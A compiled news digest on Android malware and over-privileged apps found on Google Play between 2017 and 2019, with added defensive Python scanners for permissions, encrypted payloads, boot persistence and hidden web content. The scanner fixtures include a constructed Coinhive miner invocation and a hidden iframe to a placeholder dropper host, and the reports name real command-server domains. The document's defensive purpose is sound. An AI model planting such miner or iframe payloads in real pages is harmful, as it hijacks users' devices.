On October 2, 2019, it became known that the online publication The Bell, using the AppCensus service and the Exodus application privacy audit platform, had analyzed what data is processed and transmitted by popular Android applications in the Russian Google Play Store, and what permissions they request from users. Read more here.

Avast: 937 flashlight apps abuse access to personal data

On September 10, 2019, Avast reported that flashlight applications for Android request an average of 25 permissions to access various features and data on the smartphone. Avast analyzed 937 flashlight apps in the Google Play Store using its proprietary apklab.io mobile threat analysis platform. The researchers looked both at apps still available on the Google Play Store and at those that had ever appeared in the store. According to the results, 408 applications request up to 10 permissions, 267 request from 11 to 49, and 262 applications request between 50 and 77 permissions.

Applications may legitimately request permissions to access the data or device features they need to work: a flashlight app, for example, needs access to the camera flash to use it as a torch. Many applications, however, request access to far more data than they really need.

The Avast researchers commented:

"The meaning of some of the permissions requested by the flashlight apps we studied is really hard to explain. For example, sound recording, which was requested by 77 applications, or the contact list, which for some reason 180 applications need. The most unusual item on this list is the ability to write contacts: 21 flashlight apps wanted it. The flashlight apps we reviewed are just an example of how even the simplest apps can access private information. Often, personal data is accessed not only by application developers but also by the advertisers with whom they work to monetise this information. Developer privacy policies are unfortunately not exhaustive, as in many cases third-party privacy policies are closely intertwined with them."

Top 10 apps on Google Play that ask for the most permissions:

Place  Application name                                     Permissions requested  Downloads
1      Ultra Color Flashlight                               77                     100,000
2      Super Bright Flashlight                              77                     100,000
3      Flashlight Plus                                      76                     1,000,000
4      Brightest LED Flashlight -- Multi LED & SOS Mode     76                     100,000
5      Fun Flashlight SOS mode & Multi LED                  76                     100,000
6      Super Flashlight LED & Morse code                    74                     1,000,000
7      FlashLight – Brightest Flash Light                   71                     1,000,000
8      Flashlight for Samsung                               70                     500,000
9      Flashlight - Brightest LED Light & Call Flash        68                     1,000,000
10     Free Flashlight – Brightest LED, Call Screen         68                     500,000

It is not obvious how to classify apps that ask for many permissions: as harmful, or merely as potentially dangerous. An app can legitimately ask the smartphone for access to a wide variety of features and data, and that alone does not make it malicious.

Moreover, the user decides whether to grant access to a particular function or not. It is therefore important that users carefully check the permissions an application requests before installing it, read its privacy policy and terms, and look at user feedback on the application's download page.
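The permission triage described above can be automated once the manifest has been pulled out of an APK (for example with apktool). The script below is an added example written for this page, not Avast's apklab.io code: it parses a constructed AndroidManifest.xml, compares the requested permissions against a baseline of what a flashlight app plausibly needs (the baseline, the "dangerous" list and the verdict thresholds are the author's assumptions), and reports the unneeded permissions that expose private data.

```python
"""Flag permissions a flashlight app has no plausible need for.

Added example (not Avast's apklab.io tooling). The manifest below is constructed
for illustration; the permission baselines are the author's assumptions about
what a torch app legitimately needs versus what warrants review.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Assumption: what a flashlight genuinely needs (flash access, optional
# wake lock / vibration). INTERNET is not in the baseline so that ad
# traffic shows up as "unexpected" even though it is not dangerous.
EXPECTED_FOR_FLASHLIGHT = {
    "android.permission.CAMERA",
    "android.permission.FLASHLIGHT",
    "android.permission.WAKE_LOCK",
    "android.permission.VIBRATE",
}

# Runtime ("dangerous") permissions that expose private data; the ones Avast
# singled out (audio recording, contacts, location) are among them.
DANGEROUS = {
    "android.permission.RECORD_AUDIO",
    "android.permission.READ_CONTACTS",
    "android.permission.WRITE_CONTACTS",
    "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.ACCESS_COARSE_LOCATION",
    "android.permission.READ_SMS",
    "android.permission.SEND_SMS",
    "android.permission.READ_PHONE_STATE",
    "android.permission.READ_CALL_LOG",
    "android.permission.READ_EXTERNAL_STORAGE",
    "android.permission.WRITE_EXTERNAL_STORAGE",
}

# Constructed manifest of a hypothetical over-privileged torch app.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.brightest.torch">
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.FLASHLIGHT"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
</manifest>
"""


def requested_permissions(manifest_xml: str) -> list[str]:
    """Return the android:name of every <uses-permission> element."""
    root = ET.fromstring(manifest_xml)
    name_attr = f"{{{ANDROID_NS}}}name"
    return [el.get(name_attr) for el in root.iter("uses-permission") if el.get(name_attr)]


def triage_permissions(manifest_xml: str, expected: set[str] = EXPECTED_FOR_FLASHLIGHT) -> dict:
    """Compare requested permissions against what the app category needs.

    Returns the total count plus the two lists a reviewer cares about:
    permissions outside the baseline, and the dangerous subset of those.
    """
    requested = requested_permissions(manifest_xml)
    unexpected = sorted(p for p in requested if p not in expected)
    dangerous = sorted(p for p in unexpected if p in DANGEROUS)
    # Assumption: one unneeded dangerous permission is worth a look; two or
    # more is a strong signal of data harvesting rather than a developer slip.
    verdict = "review" if len(dangerous) >= 2 else ("watch" if dangerous else "ok")
    return {
        "package": ET.fromstring(manifest_xml).get("package"),
        "total": len(requested),
        "unexpected": unexpected,
        "dangerous": dangerous,
        "verdict": verdict,
    }


if __name__ == "__main__":
    report = triage_permissions(SAMPLE_MANIFEST)
    print(f"{report['package']}: {report['total']} permissions, verdict={report['verdict']}")
    for perm in report["dangerous"]:
        print("  dangerous and unneeded:", perm)
```

The same function works for any category by passing a different `expected` baseline; the useful signal is not the raw count (the table above shows that alone is ambiguous) but the dangerous permissions that have no relation to what the app claims to do.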

Almost 102 million Android users have installed a clicker Trojan from the Google Play catalog

On August 8, 2019, Dr.Web reported that almost 102 million Android users had installed a clicker Trojan from the Google Play catalog. Read more here.

Avast specialists discovered seven spy apps in the Google Play Store

On July 18, 2019, it became known that researchers from Avast's mobile threat research and protection department had found seven applications in the Google Play Store, probably created by Russian developers, that allow a user to spy on colleagues and relatives.

Avast specialists immediately reported applications, including Spy Tracker, Employee Work Spy and SMS Tracker, to Google. The company promptly removed all applications from the Google Play Store.

Collectively, these apps have been downloaded more than 130,000 times. The largest number of installations came from Spy Tracker and SMS Tracker - they were installed more than 50,000 times.

All of the applications require that the person who wants to spy on their loved ones or colleagues have physical access to the victim's device: the application must be installed from the Google Play Store on the device being monitored. The stalker then enters their own email address, to which the application sends a password for accessing the collected data.

Once the first application is installed and configured, it downloads a second program on its own. The first application can then be removed, and the victim will not see the spyware installed on the smartphone.

The detected malicious applications could track the victim's location and collect their contacts, SMS and call history. On some devices, WhatsApp and Viber messages could also be accessed.


Full list of detected spyware applications:

  • Track Employees Check Work Phone Online Spy Free
  • Spy Kids Tracker
  • Phone Cell Tracker
  • Mobile Tracking
  • Spy Tracker
  • SMS Tracker
  • Employee Work Spy

Avast's researchers commented:

"Using applications of this type is unethical towards others. Such programs create big problems for people's privacy, and they should not appear in the Google Play Store, as they promote criminal behaviour. Employers, parents or spouses, having obtained private information, can abuse it. Some of these apps position themselves as parental control apps, but their descriptions tell a different story. We classify such applications as stalkerware, a form of spyware. With the apklab.io analytics platform, we can quickly identify them and share that information with Google so that they are removed."

Backdoor Trojan disguises itself as OpenGL ES GUI update software

On July 12, 2019, Doctor Web announced that it had identified a backdoor Trojan on Google Play that executes attackers' commands, allows them to remotely control infected Android devices and spy on users.


According to the company, the malware was named Android.Backdoor.736.origin. It is distributed under the guise of an application called OpenGL Plugin, which supposedly checks the version of the OpenGL ES graphics API and downloads its updates.

When launched, Android.Backdoor.736.origin requests several sensitive system permissions that allow it to collect confidential information and work with the file system. It also tries to obtain permission to draw windows on top of the interface of other programs.


The malicious application's window has a button for "checking" for updates to the OpenGL ES graphics API. After it is pressed, the Trojan simulates a search for newer versions of OpenGL ES, but in fact performs no check and only misleads the user.

After the victim closes the application window, Android.Backdoor.736.origin removes its icon from the list of programs in the home screen menu and creates a shortcut for launching itself instead. This makes it harder for the user to remove the Trojan later, since deleting the shortcut does not affect the malware itself.

Android.Backdoor.736.origin stays active in the background and can be started not only through the icon or shortcut, but also automatically when the system boots and on the attackers' command via Firebase Cloud Messaging. The Trojan's main malicious functionality lives in an auxiliary file that is stored encrypted in the program's resources directory; it is decrypted and loaded into memory each time Android.Backdoor.736.origin starts.

The backdoor communicates with several control servers, from where it receives attacker commands and where it sends the collected data. In addition, cybercriminals can control the Trojan through the Firebase Cloud Messaging service.

Android.Backdoor.736.origin is capable of the following actions:

  • send contact information from the phone book to the server;
  • send information about SMS messages to the server (the investigated version of the Trojan lacks the permissions needed for this);
  • send information about phone calls to the server;
  • send device location information to the server;
  • download and run an APK or DEX file using the DexClassLoader class;
  • send information about installed programs to the server;
  • download and run an executable file;
  • download a file from the server;
  • send a specified file to the server;
  • send the server information about files in a specified directory or on the memory card;
  • execute a shell command;
  • start the activity specified in the command;
  • download and install an Android application;
  • show the notification specified in the command;
  • request the permission specified in the command;
  • send the list of permissions granted to the Trojan to the server;
  • prevent the device from going to sleep for a given time.

The Trojan encrypts all data transmitted to the server with the AES algorithm. Each request is protected by a unique key, which is generated taking into account the current time. The same key encrypts the server response.

Android.Backdoor.736.origin can install applications in several ways:

  • automatically, if the system has root access (using a shell command);
  • via the system package manager (only if the Trojan is installed as a system application);
  • by showing the standard system dialog for installing programs, where the user must agree to the installation.

This backdoor therefore poses a serious danger. It not only conducts cyber espionage but can also be used for phishing, since it can show windows and notifications with arbitrary content. It can also download and install other malicious applications and execute arbitrary code. For example, on the attackers' command, Android.Backdoor.736.origin can download and run an exploit to obtain root privileges, after which it no longer needs the user's participation to install other programs.

Doctor Web notified Google of the Trojan, and as of July 2019 it had already been removed from Google Play.
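Two traits in the description above are cheap to check statically in any APK: a payload that is kept encrypted among the app's resources and decrypted at start, and runtime loading of downloaded APK/DEX code through DexClassLoader. The following added example (written for this page, not Doctor Web's analysis tooling) flags opaque high-entropy resource files and looks for the combination of string indicators that matches this backdoor's behaviour. The resource blobs and the string table are constructed stand-ins for what apktool and a strings dump would give you from a real APK; the entropy threshold, the indicator list and the escalation rule are the author's assumptions.

```python
"""Static triage for an encrypted payload in resources plus dynamic code loading.

Added example, not Doctor Web's tooling. Resource files and the string table
are constructed stand-ins for apktool output; thresholds are assumptions.
"""
import math
import random
from collections import Counter

# Strings that, in combination, point at the backdoor's behaviour. Assumption:
# none of these alone is malicious; legitimate apps use any one of them.
SUSPICIOUS_STRINGS = {
    "dalvik/system/DexClassLoader": "runtime loading of downloaded APK/DEX code",
    "android.permission.SYSTEM_ALERT_WINDOW": "draws over other apps (phishing overlays)",
    "com.google.firebase.messaging.FirebaseMessagingService": "push channel usable for C2 commands",
    "setComponentEnabledSetting": "can hide its own launcher icon",
    "javax/crypto/Cipher": "in-app crypto (payload decryption, C2 encryption)",
}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: close to 8.0 for encrypted or compressed data, low for text/XML."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def encrypted_resource_candidates(resources: dict[str, bytes], threshold: float = 7.5) -> list[str]:
    """Resource files whose entropy is too high to be plain assets.

    Assumption: files with a compressed-media extension are skipped, because
    PNG/JPEG/audio are legitimately high-entropy; very small files are ignored
    because their entropy estimate is noisy.
    """
    skip = (".png", ".jpg", ".jpeg", ".webp", ".mp3", ".ogg", ".gz", ".zip")
    return sorted(
        path for path, blob in resources.items()
        if not path.lower().endswith(skip) and len(blob) >= 512
        and shannon_entropy(blob) >= threshold
    )


def indicator_hits(strings: list[str]) -> dict[str, str]:
    """Map each suspicious string present in the string table to its meaning."""
    present = set(strings)
    return {s: why for s, why in SUSPICIOUS_STRINGS.items() if s in present}


def triage_apk(resources: dict[str, bytes], strings: list[str]) -> dict:
    payloads = encrypted_resource_candidates(resources)
    hits = indicator_hits(strings)
    # Assumption: an opaque high-entropy resource together with runtime code
    # loading is the combination worth escalating; either alone is only a note.
    escalate = bool(payloads) and "dalvik/system/DexClassLoader" in hits
    return {"payload_candidates": payloads, "indicators": hits, "escalate": escalate}


# Constructed sample: a deterministic pseudo-random blob stands in for the
# encrypted auxiliary file; repeated layout XML stands in for a normal resource.
_rng = random.Random(736)
SAMPLE_RESOURCES = {
    "res/raw/opengl_cfg.dat": bytes(_rng.getrandbits(8) for _ in range(4096)),
    "res/layout/activity_main.xml": b"<LinearLayout android:orientation=\"vertical\">" * 40,
    "res/drawable/icon.png": bytes(_rng.getrandbits(8) for _ in range(2048)),
}
SAMPLE_STRINGS = [
    "dalvik/system/DexClassLoader",
    "javax/crypto/Cipher",
    "com.google.firebase.messaging.FirebaseMessagingService",
    "setComponentEnabledSetting",
    "Check for OpenGL ES updates",
]

if __name__ == "__main__":
    report = triage_apk(SAMPLE_RESOURCES, SAMPLE_STRINGS)
    print("encrypted payload candidates:", report["payload_candidates"])
    for s, why in report["indicators"].items():
        print(f"  {s}: {why}")
    print("escalate:", report["escalate"])
```

Entropy alone produces false positives (fonts, model files, obfuscated assets), which is why the escalation rule requires the DexClassLoader indicator as well; the remaining hits are kept in the report so an analyst sees the overlay, push-channel and icon-hiding capabilities at a glance.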

Apps published in the Play Store will be manually checked

On April 17, 2019, it became known that Google had changed the Play Store's security policies to make it harder for developers of malicious Android applications to publish their products in the store. In particular, Google restricted access to certain Android APIs, and before publication in the Play Store each application must now undergo a more thorough security review and testing.


Other improvements include review of applications by people rather than only by automated tools. In addition, developers can no longer abuse Android accessibility services, and restrictions have been imposed on applications' access to some sensitive data, such as call logs and SMS.

Earlier, Google has already added a scanner to its store that searches for malware based on app activity. Other measures to strengthen the protection of the Play Store include the launch of a reward program for discovered vulnerabilities, etc.

The process of checking applications added to the Play Store from new developers without a history of publishing trusted applications has become faster and will now take days, not weeks.

The Google blog stated:

"Although most Android app developers are bona fide, some accounts are still blocked for serious systematic violations of security policies. Although in more than 99% of cases the decision to block is correct, we are very concerned about the consequences that a mistaken block can cause."

From now on, the owners of mistakenly blocked accounts can immediately appeal, and the Android team will carefully consider it. If during the verification process it turns out that the account was blocked by mistake, it will be restored[10].

Special type of advertising malware found in 206 applications

On March 14, 2019, it became known that Check Point Research had discovered a malicious campaign in the Google Play store. A distinctive strain of advertising malware was found in 206 applications with a total of almost 150 million downloads. Google was promptly notified and removed the infected apps from Google Play. Check Point named the malware SimBad, as most of the infected applications are simulator games.

SimBad's functionality falls into three groups: displaying ads, phishing, and opening other applications. Thanks to its ability to open a given URL in a browser, the attacker behind SimBad can create phishing pages for several platforms and open them in the browser, launching phishing attacks on the user.

Because the malware can open app stores such as Google Play and 9Apps, the attacker can also install a remote application from a designated server, and so can install malicious software at any time to increase their profit.

Once a user downloads and installs one of the infected applications, SimBad registers receivers for the BOOT_COMPLETED and USER_PRESENT system broadcasts, which allow it to act after the device finishes booting and while the user is using the device, respectively.

After installation, the malware connects to the designated command server to receive instructions. SimBad has extensive capabilities, such as removing its icon from the launcher (which makes it harder for the user to delete), running background ads, and opening a browser with a given URL.


The command server seen in this campaign is addroider.com. It runs an instance of Parse Server (source code on GitHub), the open-source version of the Parse backend infrastructure, which lets web and mobile application developers connect their applications to back-end cloud storage and APIs exposed by back-end applications, as well as features such as user management and push notifications.

The domain addroider.com was registered through GoDaddy with WHOIS privacy protection. Opening the domain in a browser shows a login page that looks very similar to other malware panels. The "Register" and "Sign Up" links do not work and simply redirect the user back to the login page.

According to RiskIQ data, the domain had expired seven months earlier, so this may be a re-registered domain that was originally used legitimately and is now involved in malicious activity.

Check Point researchers believe that the app developers were not aware of the malicious content of the RXDrioder SDK, the advertising SDK that carries SimBad, since the campaign was not country-specific and the SDK was developed by a different party.

As of March 2019, SimBad acts as an advertising malicious application, opening advertising pages, but has great functionality capable of a greater threat.
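The persistence and icon-hiding behaviour described for SimBad (and for the HiddenAds family above) is visible in the manifest before the app ever runs. The script below is an added example written for this page, not Check Point's tooling: it parses a constructed manifest for receivers registered to the BOOT_COMPLETED and USER_PRESENT broadcasts and checks whether the only launcher entry is an activity-alias, which is the component an app can disable at runtime to make its icon disappear. The component names, the manifest and the "suspicious" rule are the author's assumptions.

```python
"""Manifest check for SimBad-style persistence and a hideable launcher icon.

Added example, not Check Point's tooling. The manifest is constructed and the
component names are hypothetical.
"""
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"

PERSISTENCE_ACTIONS = {
    "android.intent.action.BOOT_COMPLETED": "runs after the device finishes booting",
    "android.intent.action.USER_PRESENT": "runs when the user unlocks the screen",
}

SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.simgame">
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application>
    <activity android:name=".GameActivity"/>
    <!-- the icon lives on an alias, which the app can disable to vanish from the launcher -->
    <activity-alias android:name=".Launcher" android:targetActivity=".GameActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity-alias>
    <receiver android:name=".sdk.WakeReceiver" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
        <action android:name="android.intent.action.USER_PRESENT"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""


def _actions(component) -> set[str]:
    """All <action> names declared inside a component's intent filters."""
    return {act.get(A + "name") for act in component.iter("action")}


def persistence_receivers(manifest_xml: str) -> dict[str, list[str]]:
    """Receiver name -> the persistence broadcasts it registers for."""
    root = ET.fromstring(manifest_xml)
    found = {}
    for rcv in root.iter("receiver"):
        hits = sorted(_actions(rcv) & set(PERSISTENCE_ACTIONS))
        if hits:
            found[rcv.get(A + "name")] = hits
    return found


def launcher_entries(manifest_xml: str) -> list[tuple[str, str]]:
    """(tag, name) of every MAIN/LAUNCHER entry.

    'activity-alias' entries are the ones typically disabled at runtime to hide
    the icon while the real activity keeps running.
    """
    root = ET.fromstring(manifest_xml)
    out = []
    for tag in ("activity", "activity-alias"):
        for comp in root.iter(tag):
            cats = {c.get(A + "name") for c in comp.iter("category")}
            if ("android.intent.action.MAIN" in _actions(comp)
                    and "android.intent.category.LAUNCHER" in cats):
                out.append((tag, comp.get(A + "name")))
    return out


def assess_manifest(manifest_xml: str) -> dict:
    root = ET.fromstring(manifest_xml)
    perms = {p.get(A + "name") for p in root.iter("uses-permission")}
    receivers = persistence_receivers(manifest_xml)
    launchers = launcher_entries(manifest_xml)
    # Assumption: a game that wakes on boot/unlock AND keeps its only launcher
    # icon on an alias behaves like the SimBad/HiddenAds family.
    hideable_icon = bool(launchers) and all(tag == "activity-alias" for tag, _ in launchers)
    return {
        "boot_permission": "android.permission.RECEIVE_BOOT_COMPLETED" in perms,
        "persistence_receivers": receivers,
        "hideable_icon": hideable_icon,
        "suspicious": bool(receivers) and hideable_icon,
    }


if __name__ == "__main__":
    result = assess_manifest(SAMPLE_MANIFEST)
    for name, actions in result["persistence_receivers"].items():
        print(name, "->", "; ".join(PERSISTENCE_ACTIONS[a] for a in actions))
    print("icon hideable via alias:", result["hideable_icon"], "| suspicious:", result["suspicious"])
```

A boot receiver by itself is common in benign apps (messaging, alarms), so the check is scored on the combination with the hideable launcher entry; a legitimate game rarely needs either.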

Every fifth VPN application is a potential source of malware

On January 22, 2019, it became known that the most popular free VPN applications in the Google Play Store contain problems that can threaten user security. According to a study by Metric Labs researcher Simon Migliano, one in five of the applications is a potential source of malware, and a quarter of the analyzed programs contain vulnerabilities that leak users' DNS requests.

The specialist studied 150 VPN applications, the total number of downloads of which amounted to approximately 260 million times. Of the services studied, about 85% had intrusive permissions, as well as functions that put user privacy at risk.

In particular, 57% of applications contained code to collect data on the user's last known location, 38% of applications requested access to device status information, 25% of applications tracked users' location, and some programs requested permission to use the device's camera and microphone or could secretly send SMS[11].


2018

Applications with viruses have been downloaded hundreds of thousands of times on Google Play

In March 2018, it became known that malware had been found in popular Android applications published in the Google Play catalog. The malicious code was discovered by specialists from SophosLabs (the research arm of the security company Sophos), who described the find on their blog.

The malware, which SophosLabs identified as Andr/HiddnAd-AJ, was hidden in QR code reader programs (among them QR Code Free Scan, QR Code/Barcode and QR & Barcode Scanning) and in the Smart compass application in the Google Play store. Its distributors used it to display advertisements and advertising links on the screens of mobile devices, letting the fraudsters inflate ad clicks even while the infected application itself was not in use.


When first launched, an infected application sends a request to the attackers' server to retrieve its configuration. The malware then obtains a list of links, messages and icons, which soon begin to clutter the victim's smartphone. Notably, the malware includes a small graphical component through which its operation can be controlled.

Applications infected with Andr/HiddnAd-AJ were downloaded more than 500 thousand times from Google Play. The attackers took several measures to disguise the malware: first, the malicious component was made to look like a standard Android programming library embedded in the applications, and second, it activated only several hours after the victim downloaded the software from Google Play.

SophosLabs notified Google of the danger, and the company removed all infected applications from the store. To protect against such infections, the experts recommend that Android device owners use antivirus software.[12]

Detecting malicious cryptomainers

On March 16, 2018, Avast specialists reported the discovery of two applications on Google Play, SP Browser and Mr. MineRusher, with built-in malware for mining the Monero cryptocurrency. The apps had already been downloaded by thousands of users.

In November 2017, Avast had discovered a JSMiner malware sample on Google Play: the cryptominer was hiding inside the Cooee game app.

Mobile mining starts in the same way: the user downloads the application and opens it, and the app automatically connects to the apptrackers.org website, where the Coinhive JavaScript miner for Monero is hosted. As soon as the connection to the domain is made, mining begins. The whole process goes unnoticed by the user: it runs in the background, even when the screen is off, whether the device is on mobile data or connected to Wi-Fi.

Avast specialists ran an experiment mining Monero on mobile phones. Participants saw rapid battery drain, web pages that failed to load and, in some cases, complete device malfunctions.

The emergence of malicious cryptocurrency applications

In the Apple App Store, Google Play and other online stores, you can easily find malicious cryptocurrency applications with which hackers steal money and personal data of people. This is evidenced by the data of the information security company RiskIQ, published on January 24, 2018. Read more here.

2017

More than 80 malicious apps stealing VKontakte user data removed from Google Play

Kaspersky Lab experts in just two months found 85 malicious applications on Google Play that steal user data to log into the VKontakte social network. The most popular of these was installed more than a million times, with another seven having 10,000 to 100,000 installations.

The applications stole login credentials only on devices with certain system languages: Russian, Belarusian, Ukrainian, Kazakh, Armenian, Azerbaijani, Kyrgyz, Romanian, Tajik and Uzbek. This is natural, given that the VKontakte social network is really popular only in the former Soviet Union.

In all likelihood, the criminals used the stolen data primarily to promote VKontakte groups.

"Some of the attacked users complained that they were subscribed to certain pages without their knowledge," the Kaspersky Lab publication says. "No information about attempts to use this data for more explicit fraudulent actions has been reported so far."

Most of the malicious apps were uploaded to Google Play in July and activated in October 2017. Mostly they imitated all sorts of additions to the main functionality of the social network - for example, to listen to music or track guests on a profile page on a social network. Naturally, these applications required entering a login and password for VK.com.

However, the most popular - with more than a million downloads - the application turned out to be a mobile game published on Google Play back in March. Initially, there was no malicious component in it - it appeared only in October after another update. That is, cybercriminals waited about seven months until the game gained enough popularity to ensure the maximum spread of the malicious component.

After the Laboratory notified the administrators of the social network and Google about the threat, all applications containing malicious code were removed from Google Play.[13]

How to distinguish malicious applications

"Unfortunately, despite all Google's efforts, malicious applications continue to penetrate Google Play," said Roman Ginyatullin, an information security expert at SEC Consult Services. "The example of a mobile game that acquired its malicious 'stuffing' far from immediately is very eloquent: an application can be harmless at first and then overnight begin to pose a massive threat."

As for protection, as Ginyatullin noted, users should check who is the developer of the application, even if it is published in the official Google store. In addition, if an "unofficial" application requires entering a login and password from a social network, this is a clear sign of bad intentions.

Technical details about these applications are available on the website securelist.ru.[14]

Wave of Trojans masquerading as mobile banking apps

At the end of November 2017, Group-IB noted a wave of mass distribution of Trojans masquerading as the mobile applications of leading Russian banks. Group-IB specialists block the resources from which these applications are distributed, but their number keeps growing.

The Trojans, designed for Android devices, are distributed not through the official Google Play store but through advertisements in search engines. At the same time, Group-IB experts noted the high quality of the fake programs, which confuses many users who do not pay attention to suspicious "little things." Read more here.

Authors of fake antiviruses cash in on WannaCry-related fears

In June 2017, researchers from RiskIQ discovered hundreds of mobile applications posing as means of protection against the WannaCry ransomware, in fact, turning out to be useless at best, and malicious at worst. Such applications are part of a larger problem - fake mobile antiviruses.[15]

Using a simple search on the Web, experts found more than six thousand mobile applications, designated either as antiviruses, or as sources of information about antiviruses, or as auxiliary tools that complement antivirus solutions. More than four thousand of these applications are active by mid-June 2017, while 525 of them are blacklisted by the VirusTotal service, which collects information from real antivirus solution providers.


This does not mean that all of these applications are malicious, the researchers note, adding that truly dangerous programs may also go unlisted, at least for some time.

RiskIQ specialists found 508 active applications in the Google Play Store, designated as antiviruses, while about 55 of them were blacklisted by VirusTotal. In total, 189 different mobile app stores (not only the Google Play Store) were examined. At the same time, 20% of applications from the VirusTotal lists are in the official Google store; 10.8% of them are still active today, despite the fact that store administrators regularly eliminate dubious and openly malicious programs.

For example, a fake antivirus called "Antivirus Malware Trojan" that appeared on Google Play was downloaded 10 thousand times before it was removed.

In another store - Mobiles24 - gullible users were offered Android's Antivirus, which actually contained five different versions of malware. The program was downloaded 3.5 thousand times.

Among the applications allegedly protecting against WannaCry, there were no frankly malicious ones, but they also do not give anything useful: the WannaCry ransomware does not attack mobile platforms (at least not yet), so statements about "protection" are nothing more than unscrupulous advertising. The authors of these applications exploit insufficient user awareness, as well as the hysteria associated with the recent epidemic.

As RiskIQ experts note in their publication, there is still a possibility that someone wants to equip the supposedly WannaCry-protecting applications with a malicious component.[16]

"Spammers and virus writers traditionally exploit high-profile news for their own benefit," says Ksenia Shilak, Sales Director at SEC Consult. "So it is here: many users have 'heard something' about the WannaCry epidemic, but have shown much less interest in the details: who can become a victim, which platforms are vulnerable and how to protect themselves. Lack of awareness can pose an even greater threat than vulnerabilities in software."

More than a hundred malicious apps found on Google Play

In March 2017, researchers from Palo Alto Networks identified 132 Android apps containing malicious components in the Google Play store. The Google Play administration promptly responded to the message and removed the unsafe software.

According to Palo Alto Networks, the identified applications used the Android WebView component, which lets an app render HTML content inside its interface. The static HTML pages bundled with these apps, it turned out, contained hidden IFrames linking to malicious domains.


According to the researchers, one of these infected pages tried to download and install the malware, but the download procedure and the malware itself are able to function only in the Windows environment, without causing any harm to the smartphone itself.

The malicious domains mentioned have long been inactive: control over them was intercepted by the Polish Computer Incident Response Center (CERT) back in 2013.

Apparently, the developers of these mobile applications themselves became victims of intruders. This is indicated by the use of long-deactivated malicious domains, and malware under Windows, and some similarity in the code structure, indicating the ability to generate applications using the same platform.

Palo Alto Networks experts suggest that the application developers may have used the same integrated development environment (IDE) that was already infected with malware, or an online application generation platform into which malicious code had been injected. That code, in turn, inserted the IFrames with links to the dangerous domains into the applications' HTML components.

The administration of Google Play has removed all these applications, although they themselves did not pose a threat.[17]
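Both this case and the Coinhive miners described in the 2018 section come down to web content bundled with (or loaded by) an app's WebView. The scanner below is an added example written for this page, not Palo Alto Networks' or Avast's tooling: it walks HTML assets with Python's html.parser and reports IFrames that are hidden (zero size, display:none or visibility:hidden) and point at a domain the app does not own, as well as script tags that load or call a browser-based miner. The HTML samples, the example.* domains, the miner indicator strings and the "hidden" heuristics are the author's assumptions.

```python
"""Scan bundled web content for hidden third-party IFrames and browser miners.

Added example, not Palo Alto Networks' or Avast's tooling. The HTML samples are
constructed; domains are placeholders, not the ones from the reports.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: substrings that identify the Coinhive-style JavaScript miner.
MINER_INDICATORS = ("coinhive.min.js", "CoinHive.Anonymous", "cryptonight", "CryptoNight")


def _is_hidden(attrs: dict) -> bool:
    """An iframe no user is meant to see: zero/one-pixel size or hidden by CSS."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
    return tiny or "display:none" in style or "visibility:hidden" in style


class WebViewAssetScanner(HTMLParser):
    """Collects hidden third-party iframes and miner references from one HTML asset."""

    def __init__(self, own_hosts: set):
        super().__init__()
        self.own_hosts = own_hosts
        self.hidden_iframes: list = []
        self.miner_refs: list = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            src = a.get("src") or ""
            host = urlparse(src).hostname or ""
            if host and host not in self.own_hosts and _is_hidden(a):
                self.hidden_iframes.append(src)
        elif tag == "script":
            self._in_script = True
            src = a.get("src") or ""
            if any(ind in src for ind in MINER_INDICATORS):
                self.miner_refs.append(src)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Inline script bodies arrive here while inside <script>...</script>.
        if self._in_script and any(ind in data for ind in MINER_INDICATORS):
            self.miner_refs.append(data.strip()[:60])


def scan_asset(html: str, own_hosts: set) -> dict:
    """own_hosts: domains the app legitimately embeds (so they are not flagged)."""
    parser = WebViewAssetScanner(own_hosts)
    parser.feed(html)
    parser.close()
    return {"hidden_iframes": parser.hidden_iframes, "miner_refs": parser.miner_refs}


# Constructed samples (placeholder domains).
IFRAME_SAMPLE = """<html><body>
<h1>Game news</h1>
<iframe src="https://news.example.com/feed.html" width="600" height="400"></iframe>
<iframe src="http://dropper.example.net/x.exe" width="0" height="0"></iframe>
<iframe src="http://dropper.example.org/" style="display: none"></iframe>
</body></html>"""

MINER_SAMPLE = """<html><head>
<script src="https://miner.example.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITEKEY', {throttle: 0.3});
  miner.start();
</script></head><body>Loading...</body></html>"""

if __name__ == "__main__":
    for name, html in (("iframe", IFRAME_SAMPLE), ("miner", MINER_SAMPLE)):
        print(name, scan_asset(html, {"news.example.com"}))
```

In the Palo Alto case the IFrame payload was a Windows executable, so the flagged IFrame itself is the finding, not the download; in the Avast case the miner ran in the WebView and the telltale is the script reference, which is why both checks live in one pass over the asset.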

Notes